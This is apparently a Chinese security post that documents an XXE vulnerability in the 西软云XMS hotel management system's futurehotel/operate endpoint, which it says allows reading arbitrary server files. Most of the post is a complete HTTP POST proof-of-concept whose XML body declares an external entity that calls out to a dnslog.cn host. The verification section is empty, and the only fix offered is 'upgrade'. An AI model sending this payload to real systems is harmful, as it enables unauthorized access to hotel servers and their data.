漏洞验证-西软云XMS futurehotel/operate接口XXE漏洞

一、漏洞描述

西软云XMS是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。致力于以新一代云架构为国内四，五星级中高端酒店提供灵活、高度整合酒店业务，助力酒店智能转型升级。

西软云XMS /XopServerRS/rest/futurehotel/operate接口处存在XML实体注入漏洞，攻击者可利用该漏洞读取服务端任意文件。

二、POC

POST /XopServerRS/rest/futurehotel/operate HTTP/1.1
Host: XXXX
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; rv 11.0) like Gecko
Accept: */*
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
Content-Type: text/xml
Content-Length: 81

<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://aehtwe.dnslog.cn"> 
%remote;]>

三、漏洞验证

四、漏洞修复

升级系统至最新版本。